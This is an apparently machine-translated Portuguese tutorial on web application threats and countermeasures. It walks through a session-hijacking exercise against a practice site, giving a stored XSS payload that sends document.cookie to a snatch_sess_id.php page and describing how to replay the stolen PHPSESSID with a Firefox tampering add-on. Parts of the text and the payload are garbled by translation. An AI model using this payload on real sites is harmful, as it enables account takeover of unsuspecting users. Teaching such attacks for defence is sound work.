Mais pessoas têm acesso à internet do que nunca. Isso levou muitas organizações a desenvolver aplicações baseadas na web que os usuários podem usar online para interagir com a organização. Código mal escrito para aplicações web pode ser explorado para obter acesso não autorizado a dados sensíveis e servidores web.

neste tutorial você vai aprender a hackear sites, e vamos apresentá-lo a técnicas de hacking de aplicativos web e as contra-medidas que você pode colocar em vigor para proteger contra tais ataques.

tópicos abrangidos neste tutorial

• O que é uma aplicação web? O que são ameaças na Web? como proteger o seu site contra hacks? truques de hacking de sites: hackear um site online!

O que é uma aplicação web? O que são ameaças na Web?

uma aplicação web (também conhecida como Web site) é uma aplicação baseada no modelo cliente-servidor. O servidor fornece o acesso à base de dados e a lógica de Negócio. É hospedado em um servidor web. A aplicação cliente é executada no navegador do cliente. Aplicações Web são geralmente escritas em linguagens como Java, C#, e VB.Net, PHP, ColdFusion Markup Language, etc. os motores de banco de dados usados em aplicações web incluem MySQL, MS SQL Server, PostgreSQL, SQLite, etc.

a maioria das aplicações web estão hospedadas em servidores públicos acessíveis através da Internet. Isso torna-os vulneráveis a ataques devido à fácil acessibilidade. A seguir, são ameaças comuns de aplicação web. injeção de

• SQL-o objetivo desta ameaça pode ser contornar algoritmos de login, sabotar os dados, etc.
• Ataques de Negação de Serviço– o objetivo desta ameaça pode ser a de negar a usuários legítimos tenham acesso ao recurso
• Cross Site Scripting (XSS– o objetivo desta ameaça pode ser injetar código que pode ser executado no lado do cliente navegador.
• envenenamento por Cookie / sessão-o objetivo desta ameaça é modificar os dados de cookies / sessão por um atacante para obter acesso não autorizado.o objetivo desta ameaça é modificar dados de forma, como preços em aplicações de e-commerce, para que o atacante possa obter itens a preços reduzidos.injeção de código
• – o objetivo desta ameaça é injetar código como PHP, Python, etc. isso pode ser executado no servidor. O código pode instalar backdoors, revelar informações sensíveis, etc.
• Defacement– o objetivo desta ameaça é modificar a página foi exibida em um site e redirecionando todos os pedidos de página para uma única página que contém a mensagem do atacante.

Como proteger o seu site contra hacks?

uma organização pode adotar a seguinte política para se proteger contra ataques de servidores web.

• SQL injeção-desinfectar e validar os parâmetros do Usuário antes de submetê-los à base de dados para processamento pode ajudar a reduzir as chances de ser atacado através de injeção SQL. Motores de banco de dados como MS SQL Server, MySQL, etc. parâmetros de suporte e declarações preparadas. Eles são muito mais seguros do que as declarações SQL tradicionais
• ataques de negação de Serviço – firewalls pode ser usado para reduzir o tráfego de endereço IP suspeito se o ataque é um DoS simples. A configuração adequada de redes e sistema de Detecção De intrusão também pode ajudar a reduzir as chances de um ataque DoS ter sido bem sucedido.
• Cross Site Scripting-validating and sanitizing headers, parameters passed via the URL, form parameters and hidden values can help reduce XSS attacks.envenenamento por Cookie / sessão-isso pode ser evitado criptografando o conteúdo dos cookies, cronometrando os cookies após algum tempo, associando os cookies com o endereço IP do cliente que foi usado para criá-los.
• temperamento da forma – isso pode ser evitado validando e verificando a entrada do Usuário antes de processá-lo.Injecção de código
• – isto pode ser evitado tratando todos os parâmetros como dados em vez de código executável. A higienização e validação podem ser usadas para implementar isso.
• Defacement – uma boa política de segurança de desenvolvimento de aplicações web deve garantir que ele sela as vulnerabilidades comumente usadas para acessar o servidor web. Esta pode ser uma configuração adequada do sistema operacional, software de servidor web, e as melhores práticas de segurança ao desenvolver aplicações web.

truques de hackeamento de sites: hackear um site online

neste site hackear cenário prático, vamos sequestrar a sessão de usuários da aplicação web localizado em www.techpanda.org. Usaremos o cross site scripting para ler o ID da sessão de cookies e, em seguida, usá-lo para personificar uma sessão de usuário legítima.

a suposição feita é que o atacante tem acesso à aplicação web e ele gostaria de sequestrar as sessões de outros usuários que usam a mesma aplicação. O objetivo deste ataque poderia ser ganhar acesso administrativo à aplicação web, assumindo que a conta de acesso do atacante é limitada.

começar

• abrirhttp://www.techpanda.org/
• para fins práticos, é fortemente recomendado ter acesso através de injecção de SQL. Consulte este artigo para mais informações sobre como fazer isso.
• o e-mail de autenticação é este endereço de E-mail está a ser protegido dos spambots. Você precisa de JavaScript habilitado para vê-lo. sua senha é Password2010
• Se tiver iniciado sessão com êxito, em seguida, você receberá a seguinte painel

• Clique em Adicionar Novo Contato
• Insira o seguinte como o primeiro nome

<a href=# onclick=\”do documento.location=\ ‘http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Escuro<>

AQUI

O código acima usa JavaScript. Adiciona um hiperlink com um evento onclick. Quando o utilizador não desconfiado clica no link, o evento recupera o ID da sessão de cookies do PHP e envia-o para o snatch_sess_id.página php em conjunto com o id da sessão na URL

• Insira o restante dos detalhes, como mostrado abaixo
• Clique em Salvar Alterações

• Seu painel agora se parece com o seguinte ecrã

• Desde o cross site script de código é armazenado no banco de dados, ele será carregado toda vez que o os usuários com direitos de acesso de início de sessão
• Vamos supor que o administrador de logins e clica no hiperlink que diz Escuro
• Ele/ela vai ter a janela com o id da sessão, mostrando no URL

Nota: o script pode ser de enviar o valor para algum servidor remoto onde o CO é armazenado em seguida, o usuário redireccionado para o site, como se nada tivesse acontecido. Nota: o valor que você obtém pode ser diferente do deste tutorial de hacking webpage, mas o conceito é o mesmo de personificação de sessão

usando Firefox e Adulteração de dados add-on

o fluxograma abaixo mostra os passos que você deve tomar para completar este exercício.

• Você vai precisar do navegador web Firefox para esta seção e Adulteração de Dados add-on
• Abra o Firefox e instalar o suplemento, como mostrado nos diagramas abaixo

• Busca por adulteração de dados, em seguida, clique em instalar como mostrado acima

• Clique em Aceitar e Instalar…

• Clique em Reiniciar agora quando a instalação for concluída
• Ativar a barra de menus no Firefox se ele não é mostrado

• Clique no menu ferramentas, em seguida, escolha Tamper Data como mostra abaixo

• você terá a seguinte janela. Nota: Se o Windows não estiver vazia, aperte o botão limpar

• Clique em Iniciar Tamper menu
• Alternar de volta para o navegador web Firefox, digite http://www.techpanda.org/painel de controle.php, em seguida, pressione a tecla enter para carregar a página
• Você receberá a seguinte pop-up de violação de Dados

• A janela de pop-up tem três (3) opções. A opção de adulteração permite modificar a informação do cabeçalho HTTP antes de ser submetida ao servidor.
• Clique sobre ele
• Você receberá a seguinte janela

• Copie o PHP IDENTIFICAÇÃO da sessão que você copiou do ataque URL e cole-após o sinal de igual. O valor deve agora olhar como este

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Clique no botão OK
• Você terá a Adulteração de dados janela pop-up de novo

• Desmarque a caixa de seleção que pede para Continuar a Adulteração?
• Clique no botão enviar quando terminar
• Você deve ser capaz de ver o painel como mostrado abaixo

Nota: nós não loginamos, nós personificamos uma sessão de login usando o valor PHPSESSID que recuperamos usando scripting de cross site

resumo

• uma aplicação web é baseada no modelo servidor-cliente. O lado cliente usa o navegador web para acessar os recursos no servidor.
• aplicações Web são geralmente acessíveis através da internet. Isto torna-os vulneráveis a ataques.as ameaças de aplicação web incluem injeção de SQL, injeção de código, XSS, Defacement, envenenamento de cookies, etc.uma boa política de segurança ao desenvolver aplicações web pode ajudar a torná-las seguras.